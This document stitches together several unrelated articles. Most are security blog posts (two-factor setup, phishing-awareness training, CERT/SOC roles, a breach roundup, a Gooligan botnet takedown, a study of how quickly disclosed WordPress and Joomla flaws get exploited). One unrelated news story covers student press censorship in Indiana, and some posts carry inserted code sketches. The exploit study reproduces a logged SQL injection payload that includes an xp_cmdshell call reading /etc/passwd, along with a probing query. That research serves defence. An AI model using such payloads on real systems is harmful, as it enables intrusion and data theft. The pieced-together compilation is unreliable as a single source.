LinkedIn also has “Two-Step Verification.” On the LinkedIn site, hover your mouse over your avatar and a drop-down menu should appear. Click on Privacy and Settings, and then click on Account. You should then see Security Settings, which you should also click. Finally, you should see the option to turn on Two-Step Verification for Sign-In. Turn that on to get your code.

These are only a few of the major sites that have two-step verification. Many others do, too, so always check to see if your accounts have this option. If they don’t, see if there is another option that you can use in addition to your password to log in. This could be an email or a telephone call, for instance. This will help to keep you safe.


Amazon’s Two-Step Verification adds an additional layer of security to your account. Instead of simply entering your password, Two-Step Verification requires you to enter a unique security code in addition to your password during sign in.

Without two-step authentication on your most critical accounts, all a criminal needs is your username, which is often your email address, plus access to the data breach files containing billions of passwords that are posted all over the web. Once they look up the password associated with your username or email, they are in.

Two factor locks them out.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of a cybersecurity speaking and consulting firm based in Massachusetts. See him discussing internet and wireless security on Good Morning America.

Is Your Small Business Staff Trained in Security Awareness?

The Ponemon Institute released a shocking statistic: about 80% of all corporate data leaks are due to human error. In other words, it only takes a single staff member to cause a huge issue. Here's a scenario: Let's say that you have an employee, Betty. Betty is lovely. We love Betty. But when Betty is checking her personal email during her lunch break and sees an offer that promises a 10-pound weight loss in only a week, she wants to learn more about it, so she clicks the link in the email. What she doesn't realize is that by clicking that link, she just installed a virus onto the computer. In addition, the virus now has access to your company's network.

This was a very simple act, one that most of us do every day. However, this is why it is so important that your staff is up to date on security awareness. How can you do this? Here are some tips:

  • Present your staff with information about security awareness, and then set up a test where you send them a link they will want to click. This process is known as “phishing simulation.” If your staff members click on the links, and they probably will, they will be taken to a safe page. On that page, however, is a message telling them that they fell for a scam, and that although they are safe this time, there could have been serious repercussions.
  • The staff members who click the link should be tested again. This way, you will know if the message got through.
  • Make sure when you give these tests that it isn’t predictable. Send the emails at different times of day and make sure they look different and have a different message. For instance, don’t send the “lose 10 pounds” email twice.
  • Think about hiring someone, a stranger, who will try to get your staff to give them sensitive information about your company over the phone, through email, or even in person. This is a valuable test, as it helps you to determine who the “weak links” are in your company.
  • Give your staff quizzes throughout the year to see who is paying attention to security.
  • You should focus on education, not discipline, when you are doing this. Don’t make them feel bad or punish them. Instead, make sure they know what they did wrong and work on not doing it again.
  • Ensure that your team knows that a data breach can also result in financial, legal, and criminal problems.
  • Schedule checks of workstations to see if any employee is doing something that might compromise your company’s sensitive data. This includes leaving information on a screen and walking away.
  • Explain the importance of security to your staff, and encourage them to report any activity that seems suspicious.
  • After training and testing your staff, make a list of all the concepts that you want them to understand. Look at this list often, and evaluate it again and again to see if anything needs to be changed.
  • Don't forget company officers. When company officers are omitted from this kind of training, it reflects poorly on the organization. Some security personnel are afraid to put their executives on the spot. That is a huge mistake. Security starts at the top.
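The retest idea in the steps above can be tracked with something as simple as the following sketch (the campaign names and employee records are made up for illustration):

```python
# Hypothetical phishing-simulation results: who was sent each test
# email and whether they clicked.
results = [
    {"campaign": "lose-10-pounds", "employee": "betty", "clicked": True},
    {"campaign": "lose-10-pounds", "employee": "dan",   "clicked": False},
    {"campaign": "parcel-notice",  "employee": "betty", "clicked": True},
    {"campaign": "parcel-notice",  "employee": "dan",   "clicked": False},
]

def repeat_clickers(results):
    """Employees who clicked in more than one campaign; the retest
    shows whether the awareness message got through."""
    counts = {}
    for r in results:
        if r["clicked"]:
            counts[r["employee"]] = counts.get(r["employee"], 0) + 1
    return sorted(e for e, n in counts.items() if n > 1)

print(repeat_clickers(results))  # → ['betty']
```

Repeat clickers are candidates for additional education, not discipline, in keeping with the points above.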

Remember, there is nothing wrong with sharing tips with your staff. Post them around the office and keep reminding employees to stay vigilant. This helps the information remain fresh in their minds, and helps you to recognize those who are taking security seriously.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of a cybersecurity speaking and consulting firm based in Massachusetts. See him discussing internet and wireless security on Good Morning America.

Inside the fight to prevent censorship of Indiana student journalists


Plainfield High School student journalist Anu Nattam (center) holding the special edition of her school magazine the day of testifying in favor of Bill 1016

Olivia McLellan: FOX59/CBS4

After a group of student journalists in Indiana published an issue of their high school magazine last October that focused on dating and relationships, the school implemented a policy of content review prior to publication. This, some students say, amounts to censorship that is compromising their journalistic education.  

The October issue of the Plainfield High School publication, the Quaker Shaker, was the magazine's first “special topic” edition, called the Shakedown. It explored the ins and outs of relationships in high school, including polls about the prevalence of sexting as well as more serious topics like dating violence. It even won an award, marking the first time the publication had won a national-level prize.

But parents and school administrators took issue with the content of the issue, particularly the sexting poll and the use of Urban Dictionary definitions of words like “polyamory” and “friends with benefits.” In particular, one family member of the school board president blasted the publication on social media, encouraging people to complain to the school and the school board president, and even asking why local churches were not rising up.

Now, student journalists at Plainfield need administrative approval to publish. As a result of this pushback, Plainfield High School journalism adviser Michelle Burress said that an advisory committee has been set up to evaluate every publication before it goes to press. The principal must approve anything before it is published.

To Anu Nattam, a co-editor of the publication, this policy shows that her school wants her magazine staff to act as a public relations team rather than journalists. Since the policy was implemented, she said that they were forced to change the name of their special edition issues to the Shakeout. Nattam said the school argued that the name Shakedown had mafia connotations.

“We’ve also had to change quotes, and delete quotes, for trivial things that make no sense,” Nattam said. She also notes that they were asked to change the cover photo of one magazine issue merely because it showed a picture of a clothed posterior.

But it is her responsibility as a student journalist, Nattam said, to report on issues that are relevant to the student body, even if they might be controversial.

“Filtering reports and restricting ideas is not only an injustice to student journalists, but to the people reading the stories we write. Ideas and facts that impact a student body are not always going to make a school look good. Just like in real life, not everything is sunshine and rainbows.”

Nattam’s adviser Michelle Burress said that now, students are self-censoring, and worry about everything they write coming under intense scrutiny. “They are shying away from topics that normally they would not hesitate to cover because they do not want to get shot down,” she said. “More than ever this year, students are saying that they do not want to be quoted or pictured in the news magazine or yearbook.”

Ed Clere, a member of the Indiana House of Representatives, thinks this is a huge problem. “Most people would have been proud to have student journalists who could produce work of that caliber,” he said of the Shakedown’s dating and relationships issue. Nothing the Plainfield High School student journalists have done or published, he said, has justified the censorship and “over the top” reaction that has ensued.

In two sessions of the Indiana General Assembly, Clere has introduced legislation that would protect the free speech rights of student journalists across the state. It would have prohibited schools from encroaching on students’ speech rights except in very specific situations.

The bill reads: “This chapter may not be construed to authorize or protect content of school sponsored media by a student journalist that: (1) is libelous or slanderous; (2) violates federal or state law; (3) incites students to: (A) create a clear and present danger of the commission of an unlawful act; (B) violate a public school or school corporation policy; or (C) be disruptive of the operation of the public school; or (4) encourages, promotes, or supports behavior contrary to citizenship or moral instruction required under IC 20-30-5.”

House Bill 1016 was supported by many student journalists, including Anu Nattam, who testified in its favor, as well as teachers and administrators. But organizations including the Indiana School Boards Association and the Indiana Association of Public School Superintendents, fiercely opposed the bill. It died narrowly in the House on February 5, 2018.

Since a similar bill had failed the year before, Clere knew he was facing an uphill battle, but he was still surprised at the level of resistance and opposition the legislation encountered.

Clere cited a 1988 Supreme Court case that limited student publication freedom, Hazelwood School District v. Kuhlmeier, as a “big step backward” for the First Amendment rights of young journalists. “[School board superintendents and principals] like the absolute control they enjoy under Hazelwood. They don’t want to give it up.”

Indiana is far from the only state in which legislators, students, and teachers are fighting together to grant speech protections to student journalists. Clere said that efforts in Indiana are part of an initiative by the Student Press Law Center—a network, called New Voices, of state campaigns to pass such legislation.

Some states, including California, Montana, and Illinois, have successfully enacted New Voices legislation like Clere’s Bill 1016. But most states have not.

In Indiana, Clere isn’t giving up. Assuming he is re-elected, he vowed that he would “keep trying, and keep bringing this legislation back as long as I am able.” While he is open to discussion and addressing some of the concerns of school administrators, he said he is not open to watering down the bill to the point where it is meaningless.

“This is about more than journalism education and student publications,” Clere said. “Censorship of student journalists hurts entire school communities. It deprives them of the important and relevant stories and conversations that benefit all students.”

Nattam agrees. “People need to realize that by limiting press freedom for students, they are limiting their education. That’s what I feel like was done to me and my staff—our education was compromised, because we can’t be put in the same environment as a professional journalist. So, we can’t prepare for a career in journalism if that's what we choose to do.”

“If anything, this whole thing has fueled my passion for journalism,” Nattam said. “The press is how the public stays informed.”

Critical Infrastructure Under Attack

Security researchers have long shared their concerns about potential cyberattacks on critical infrastructure systems. Over the past few weeks, there have been several reports highlighting the dangers of such attacks. According to the New York Times, investigators believe that a cyberattack against a petrochemical plant in Saudi Arabia in August last year was intended to not only sabotage the plant’s operations but also cause an explosion that could have killed people. The only thing that reportedly prevented the explosion was a mistake in the computer code used by the attackers. Experts believe that a nation-state attacker was responsible, given that there was no obvious financial motivation from the attack. Also this month, the US accused Russia of a wide-ranging cyber-assault on its energy grid and other parts of its critical infrastructure, with many of the reported tactics resembling the Dragonfly 2.0 campaign, in which hackers infiltrated energy facilities in North America and Europe.

We are at an alarming point in terms of our critical infrastructure security, where governments around the world are on high alert to the potential for damaging attacks. The head of the UK’s National Cyber Security Centre (NCSC) warned in January that he expects the UK to suffer a major, crippling cyberattack against its national critical infrastructure during the next two years.

Nation state attackers are well aware of the political fallout that could arise as a result of dangerous cyberattacks on control networks, and so it is imperative that security issues within these systems are addressed urgently.

Industrial control systems at risk

The National Cyber Security Centre is right to be concerned about potential cyberattacks against UK critical infrastructure. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats, often believed to be the work of foreign governments seeking to cause everything from mischief to political upheaval. While offering many benefits in terms of productivity and visibility, the greater connectivity arising from the Internet of Things has also exposed many industrial control systems to a range of damaging cyberattacks. For example, DDoS attacks can be used to disrupt the availability of critical services, while simultaneously allowing attackers to plant damaging, or as in the Saudi case even weaponized, malware. Last October’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity of cyberattacks to affect people’s access to essential services. The current cyber security landscape has changed almost beyond recognition: ten years ago, only the most Orwellian futurists would have predicted that major national elections would be manipulated by cyberattacks.

What’s next?

The pressure is now on for the cyber security community and governments to act on this issue and defend against this apparent increase in nation state attacks. The NIS Directive in the UK and EU and the NIST framework in the US present a golden opportunity to improve critical infrastructure cyber security. But to be truly effective, these regulations must compel operators of essential services to deliver higher levels of cyber security and require that these essential services remain available during an attack. As seen in recent days with Facebook and Cambridge Analytica, it won’t matter if infrastructure operators claim ‘tick-box’ regulatory compliance as their defence if their essential service has failed to remain open for business during a nation state sponsored cyber-attack.

To find out more, contact us.

CERTs, CSIRTs and SOCs after 10 years from definitions

Nowadays it is hard to give firm definitions of the differences between Security Operations Centers (SOCs), Computer Emergency Response Teams (CERTs), and Computer Security Incident Response Teams (CSIRTs), since the terms are widely used in many organisations accomplishing very close and similar tasks. Robin Ruefle (2007), in her paper titled "Defining Computer Security Incident Response Teams" (available here), gave us a nice idea. She also admits (at the end of the paper) that there is no strong difference between the common terms CSIRT, CERT, CSIRC, CIRT, and IHT. Her conclusion made me think about how this topic has evolved over the past 10 years.

Despite her amazing work on defining (let me call them) CSIRTs, I would like to give you more detail on how those teams have evolved over the past decade, based on my personal experience directly in the field. Indeed, after being involved in building several CERTs, organising CSIRTs, and evaluating SOCs, I started to spot strong and weak similarities between those teams. Today I'd like to share those strong and weak similarities without talking about "differences", since there is no real evidence of differences at all.

Each team is called on for cybersecurity incidents, but each holds specific aims and responds to incidents in a specific way. Every team needs to understand what happened after a cybersecurity-related incident, and this is the strongest common point that every team takes care of: deeply understanding what happened. No team is better or more dedicated than another at understanding what really happened during an incident; every team has full autonomy to figure it out through inspection and analytical skills. The weak similarities come after the initial understanding (analysis) phase. CSIRT and SOC teams usually study the incident looking for a response, while a CERT usually tries to forecast incidents. The definition of response highlights the "weak similarities" between CSIRT and SOC.

A CSIRT usually (but not necessarily) looks at an incident from a "business" perspective, taking care of (but not limited to): communication countermeasures, policy creation, insurance calls, business impact analysis, technical skillsets, and of course technical mitigations. For example, a CSIRT would work with the marketing area to evaluate a communication strategy after a successful incident hits the company, or it could call insurers to evaluate whether they will cover some of the damages, or it could interact with the HR area to define missing skillsets in the organisation. Of course it is able to interact with defensive technologies, but that is only one subset of its tasks.

A SOC usually (but not necessarily) looks at an incident from a more "technical" perspective, taking care of (but not limited to): incident forensics, log analysis, vendor calls, patch distribution, vulnerability management, and software/hardware tuning. For example, after an incident happens to an organisation, its SOC would try to block it, involving all its resources to stop the threat by acting on peripheral devices or running commands directly on users' machines. The SOC deeply understands SIEM technology and is able to improve it; it is also able to use and interact with defensive teams and/or technologies such as sandboxes, proxies, and WAFs. The SOC team holds strong network-oriented capabilities.

CERT teams usually take care of incidents following community sharing procedures such as (but not limited to): feeds, bulletins, and Indicators of Compromise (IoCs), applying effective governance actions to local IT/SOC teams and enabling them to mitigate the incident in the fastest way possible. CERT team members work a lot with global incidents, understanding new threats and tracking the movements of known threats. They usually work with threat intelligence platforms and high-level dashboards to better understand the evolution of threats and forecast new attacks.
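A minimal sketch of that IoC-sharing workflow: sweeping local logs for indicators pulled from a community feed. The feed entries and log lines below are invented (reserved example domains and addresses are used as placeholders):

```python
# Invented IoC feed, as might be distributed in a CERT bulletin.
ioc_feed = {
    "domains": {"evil.example.com", "c2.example.net"},
    "ips": {"203.0.113.66"},
}

# Invented local DNS and connection logs to sweep.
dns_log  = ["intranet.local", "evil.example.com", "updates.vendor.example"]
conn_log = ["198.51.100.9", "203.0.113.66"]

def ioc_hits(feed, dns_log, conn_log):
    """Return indicators from the feed that appear in local logs,
    i.e., the matches a CERT would escalate to the IT/SOC team."""
    return {
        "domains": sorted(set(dns_log) & feed["domains"]),
        "ips": sorted(set(conn_log) & feed["ips"]),
    }

print(ioc_hits(ioc_feed, dns_log, conn_log))
# → {'domains': ['evil.example.com'], 'ips': ['203.0.113.66']}
```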

CERTs and SOCs are usually focused on prevention, asking questions such as (but not limited to): what are the best rules to apply? What are the procedures in case of an incident? They are really focused on using threat intelligence to spot attacks and block incidents. On the other hand, CERTs and CSIRTs are mostly focused on guidelines and business impact analysis, while SOCs and CSIRTs really need to follow incident response procedures in order to apply their strong technical skills to mitigate the attack. The following image tries to highlight the main (but not the only) keywords you would probably deal with if you work in a SOC, a CERT, or a CSIRT.

The main ideas (but not the only ones) behind the three teams can be summed up in three terms: mitigation (belongs to the SOC), response (belongs to the CSIRT), and alerting/prevention (belongs to the CERT). I'd like to point out that mitigation and response are quite different concepts. Mitigation takes a technical view of the resolution, while response takes a more business-oriented view. Mitigating an incident means "taking it down", restoring the attacked system to the state it was in before the incident; an incident response can include more sophisticated actions that involve the board of directors in the decision process as well.

Similar teams with distinct attitudes need different professional profiles. Usually (but again not necessarily) SOC teams need more technical profiles, with hard skills such as vendor-based certifications, network-oriented attitudes, and forensic attitudes. CSIRT teams need mixed profiles, oriented to technical skills but also with a business view: risk evaluation, guideline building, and communication skills. CERTs need a wide landscape view of threats, and for that reason they need to know threat intelligence, know prevention tools, and be part of strong IoC-sharing communities. Developer skills are not mandatory on these teams, but if "quick and dirty" scripting skills are in place, the entire team will benefit from them. Automation and integration are widely needed in such teams, and a scripting profile makes those integrations possible.

As mentioned at the beginning of this post, it is hard, almost impossible, to give hard definitions of the evolution of "CSIRTs", but it is possible to observe strong and weak similarities in order to better understand which team is most suitable for each organisation. If you belong to a "CSIRT", a "SOC", or a "CERT" and you feel like you are doing a little bit of each team's work according to this post, well, that is OK! In ten years, "things" have changed a lot from the original definitions, and it is quite normal to be involved in hybrid teams.

Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout

One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.

“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.

Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.

As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including travel booked through Amex Travel Representatives.

Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current site was not affected.


Other trending cybercrime events from the week include:

  • State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
  • Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
  • Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
  • Other notable events: Frost Bank said that malicious actors comprised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

Facebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting firm Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.

“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”

It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.

The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.

Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.

Taking down Gooligan part 3 — monetization and clean-up

This post provides an in-depth analysis of Gooligan's monetization schemes and recounts how Google took it down with the help of external partners.

This post is the final post of the series dedicated to the hunt and take down of Gooligan that we did at Google in collaboration with Check Point in November 2016. The first post recounts the Gooligan origin story and offers an overview of how it works. The second one provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. As this post builds on the previous two, I encourage you to read them if you haven’t done so already.

This series of posts is modeled after the talk I gave on the subject at Botconf in December 2017. Here is a recording of the talk:

You can also get the slides here, but they are pretty bare.


Gooligan's goal was to monetize the infected devices through two main fraudulent schemes: ad fraud and Android app boosting.

Ad fraud

Gooligan Fraudulent ads pop up

As shown in the screenshot above, periodically Gooligan will use its root privileges to overlay an ad popup for a legitimate app on top of any activity the user was currently doing. Under the hood, Gooligan knows when the user is looking at the phone, as it monitors various key events, including when the screen is turned on.

We don't have much insight into how effective those ad campaigns were or who was reselling them, as they don't abuse Google's ads network, and they use a gazillion HTTP redirects, which makes attribution close to impossible. However, we believe that ad fraud was the main driver of Gooligan's revenue, given its volume and the fact that we blocked its fake installs, as discussed below.

App Boosting

The second way Gooligan attempted to monetize infected devices was by performing Android app boosting. An app boosting package is a bundle of searches for a specific query on the Play store, followed by an install and a review. The search is used in an attempt to rank the app for a given term. This tactic is commonly peddled in App Store Optimization (ASO) guides.

Example of Play Store boosting service

The reason Gooligan went through the trouble of stealing OAuth tokens and manipulating the Play store is probably that the defenses we put in place are very effective at detecting and discounting fake synthetic installs. Using real devices with real accounts was the Gooligan authors’ attempt to evade our detection systems. Overall, it was a total failure on their side: We caught all the fake installs, and suspended the abusive apps and developers.

Play Store Fraud Diagram

As illustrated in the diagram above, the app boosting was done in four steps:

  1. Token stealing: The malware extracts the phone’s long term token from the phone’s accounts.

  2. Taking order: Gooligan reports phone information to the central command and control server and receives a reply telling it which app to boost, including which search term to use and which comment to leave (if any). Phone information is exfiltrated because the Gooligan authors also had access to non-compromised phones and were trying to use information obtained from Gooligan to fake requests from those phones.

  3. Token exchange: The long term token is exchanged for a short term token that allows Gooligan to access the Play store. We are positive that no user data was compromised by Gooligan, as no other data was ever requested by Gooligan.

  4. Boosting: The fake search, installation, and potential review is carried out through the manipulated Play store app.


Cleaning up Gooligan was challenging for two reasons: First, as discussed in the infection post, its reset persistence mechanism meant that a factory reset was not enough to clean up old unpatched devices. Second, the OAuth tokens had been exfiltrated to Gooligan servers.

Asking users to reflash their devices would have been unreasonable, and issuing an OTA (Over The Air) update would have taken too long. Given this difficult context and the need to act quickly to protect our users, we went for an alternative solution that we rarely use: orchestrating a takedown with the help of third parties.


Gooligan sinkhole efficiency chart

With the help of the Shadowserver Foundation and domain registrars, we sinkholed Gooligan domains, pointing them to Shadowserver-controlled IPs instead of IPs controlled by the Gooligan authors. This sinkholing ensured that infected devices couldn't exfiltrate tokens or receive fraud commands, as they would connect to sinkhole servers instead of the real command and control servers. As shown in the graph above, our takedown was very successful: it blocked over 50M attempts to connect to Gooligan's control server in 2017.
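The mechanics of a sinkhole are simple to sketch. The toy server below only accepts check-ins, records the peer for telemetry, and never answers, so no commands can reach the bots; it is of course nothing like the production Shadowserver infrastructure, and every name here is illustrative:

```python
import socket
import threading

class Sinkhole:
    """Minimal TCP sinkhole in the spirit of the takedown described above:
    accept check-ins from infected devices, record the peer address as
    telemetry, and hang up without ever sending a command."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((host, port))  # port 0: let the OS pick a free port
        self.sock.listen(5)
        self.address = self.sock.getsockname()
        self.hits = []  # one entry per blocked check-in attempt

    def serve_one(self):
        conn, peer = self.sock.accept()
        self.hits.append(peer)  # log the infected device's address
        conn.close()            # close without answering: no C2 commands flow

sink = Sinkhole()
t = threading.Thread(target=sink.serve_one)
t.start()

# Simulate an infected device whose C2 domain now resolves to the sinkhole:
bot = socket.create_connection(sink.address)
bot.close()
t.join()
print(len(sink.hits))  # one recorded, blocked check-in
```

A real deployment would also aggregate this telemetry and report infected IPs back to carriers and network owners, which is part of what makes sinkhole data useful for remediation.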


Example of Notifications sent to Gooligan victims

With the sinkhole in place, the second part of the remediation involved resecuring the accounts that were compromised, by disabling the exfiltrated tokens and notifying the users. Notification at that scale is very complex, for three key reasons:

  • Reaching users in a timely fashion across a wide range of devices is difficult. We ended up using a combination of SMS, email, and Android messaging, depending on what communication channel was available.

  • It was important to make the notification understandable and useful to all users. Explaining what was happening clearly and simply took a lot of iteration. We ended up with the notification shown in the screenshot above.

  • Once crafted, the text of the notification and help page had to be translated into the languages spoken by our users. Performing high quality internationalization for over 20 languages very quickly was quite a feat.


Overall, in order to respond to Gooligan, many people, including myself, ended up working long hours through the Thanksgiving weekend (an important holiday in the U.S.). Our commitment to quickly eradicate this threat paid off: On the evening of Monday, November 29th, the takedown took place, followed the next day by the resecuring of the compromised accounts. All in all, this takedown took only a few days, which is blazing fast when you compare it to other similar ones. For example, the Avalanche botnet takedown took four years of intensive efforts.

To conclude, Gooligan was a very challenging malware to tackle, due to its scale and unconventional tactics. We were able to meet this challenge and defeat it, thanks to a cross-industry effort and the involvement of many teams at Google that didn’t go home until users were safe.

Thanks for reading this post all the way to the end. I hope it showcases how we approach botnet fighting and sheds some light on some of the lesser known, yet still critical, activities that our research team assists with.


A bientôt!

How to download your Facebook data

With all the news about Facebook recently, you might be wondering, what exactly does Facebook know about me from my profile? Sure, you can peruse your profile online, but that doesn’t tell the whole story. One way to see what Facebook has on you is to download your Facebook data.

The ability to download your Facebook data isn’t really new, but not many users know that you can do it. It only takes a few minutes; how long depends on how big your data files are. Here are the steps to download your Facebook data.

If you’ve decided that you want to leave Facebook completely, here’s how to delete, disable, or limit your Facebook account.


Life Cycle of a Web App 0 Day


Over the past few months, I've been monitoring the proliferation of exploits for some of my disclosed WordPress plugin and Joomla extension vulnerabilities against Akamai customers. I started this observation process expecting a predictable conclusion: severe vulnerabilities like SQL injection, RFI, and LFI would receive the most attention on any CMS platform, while less severe vulnerabilities such as XSS and path disclosure would receive less attention from attackers.

The initial idea was to track three of my own disclosures after they had been published and see how much time elapsed until they were weaponized and exploited in the wild. In total, I had released three previously unknown SQL injection vulnerabilities in three well-known Joomla extensions. These vulnerabilities had been remedied by the original authors prior to the research being published, and the disclosures appeared to go unnoticed by the black-hat community.

This paper examines the time elapsed between when a vulnerability is publicly disclosed and when we begin to observe widespread exploitation attempts by adversaries.

What Happened

The three disclosed vulnerabilities were released in September 2016 and are listed in the following table. Each advisory details a SQL injection vulnerability that does not require the attacker to have a login on the target's website:

Date         Description                               CVE ID
2016-09-16   Huge-IT Portfolio Gallery Plugin v1.0.6   CVE-2016-1000124
2016-09-15   Huge-IT Video Gallery v1.0.9              CVE-2016-1000123
2016-09-16   Huge-IT Catalog v1.0.7 for Joomla

After nearly a year, I decided to investigate what might be causing my disclosures to be ignored. I looked at other SQL injection vulnerabilities in Joomla extensions that were turning up in Akamai's attack logs and found an obvious difference: while my advisories had permeated the usual exploit curator websites, they had not made it over to the exploit databases that attackers appear to monitor. Two days after submitting all three exploits to one such database, I found a hit in Akamai's logs. The attack attempt originated from an IP address belonging to a telecommunications company in North Africa, targeting a .mil website with the SQL injection in Huge-IT Portfolio v1.0.9 using SQLmap.

Path: ajax_url.php
Query: QmX=6156 AND 1=1 UNION ALL SELECT 1,NULL,'alert("XSS")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')
User-Agent: sqlmap/ (

A second attack occurred five days later. This time the attacker targeted a Russian e-commerce site, attempting to redirect the malicious requests through a popular online auction house. The requests appear to be probing for other injection points, since each request placed a single quote (') at a different query parameter.

Query: option=com_catalog&_sacat=&_ex_kw='A=0&_mPrRngCbx=1&_udlo=&_udhi=&_sop=12&_fpos=&_fspt=1&_sadis=&LH_CAds=&task=viewitem&secid=13&id=34&Itemid=10&rmvSB=true


It seemed that malicious actors use exploit-db and CXsecurity specifically as their RSS feed of vetted, working exploits. Conversely, while advisories published on Packet Storm were quite relevant to the information security industry as a whole, they were not formatted into easily consumable exploits the way sites like exploit-db curate them. Not to leave the most popular CMS out of the fun, I also publicly disclosed a path traversal vulnerability in a WordPress plugin named Membership Simplified [CVE-2017-1002008]. I released the details on March 14, 2017 and began seeing entries in our logs on Saturday, March 18, 2017 at 9:00:00 PM, just four days later. This response time was in stark contrast to my Joomla extension publications.

Why are newly disclosed WordPress plugin vulnerabilities so aggressively pursued? One possible theory is that there are multiple open source tools and frameworks available to scan for plugin vulnerabilities on WordPress websites. These freely available tools are lacking for the Joomla platform.

It is not just the severity of the vulnerability but the proliferation of the software platform that increases its target footprint. WordPress has an enormous market share of the content management software in production on the internet. There are entire frameworks, websites and even companies focused on WordPress core and plugin security.

What about a truly severe vulnerability? Something that doesn’t require authentication and allows the attacker to change content, possibly even execute code?

Earlier this year a researcher at Sucuri, Marc-Alexandre Montpas, released a vulnerability affecting WordPress < 4.7.2. The vulnerability abuses a type juggling bug where any non-integer input bypasses the authentication mechanism, allowing a remote unauthenticated attacker to modify any blog post.

I started monitoring attack traffic for this specific vulnerability, via Akamai log files, immediately after it was made public. The WordPress JSON API vulnerability was assigned CVE-2017-1001000. It first popped up in our attack logs on Wed, 01 Feb 2017 18:00:00 GMT, around 1 PM EST, just three hours after Sucuri published their blog post.

It only took three hours after the vulnerability went public to see exploit attempts against Akamai customers turning up in the logs. A few months later, the logs show only a few thousand attempts per day, primarily targeting government and military websites. Most of the log entries were generated by the customers themselves, and large portions of these scans originate from security companies performing web application security assessments for those customers. The entries that didn't originate from a security company or the target's own DMZ tended to be POST requests rather than GET, presumably to minimize noise and to bypass WAF filters, as there were many ways to deliver the JSON payload when exploiting this vulnerability.

Shortly after the disclosure by Marc and Sucuri, an article was published stating that over 1.5 million websites had been compromised using this vulnerability. Why am I not seeing the same widespread exploitation attempts against Akamai customers? The answer was simple: the majority of Akamai customers aren't running WordPress, and the attackers were using Google dorks to determine which sites were.

A Google dork is an advanced search method used to increase Google's search granularity. To get a quick idea of how many websites rely on WordPress, I searched Google for URLs that contain the string /wp-content, which returns "About 280,000,000 results".

To further my examination of these attacks, I looked at other exploits against Joomla, as it is the second most popular CMS on the internet. I found that, again, SQL injection and path traversal vulnerabilities were the most popular. The top Joomla examples are listed here, but I primarily focus on WordPress because of its deep penetration into the content management ecosystem.

I discovered that with attacks focusing on Joomla extensions, the majority of the traffic originated from Virtual Private Servers (VPS) and appeared to be legitimate attack attempts. The logs revealed the opposite for WordPress: the majority of attack attempts originated from the target's own DMZ and were self-scans.


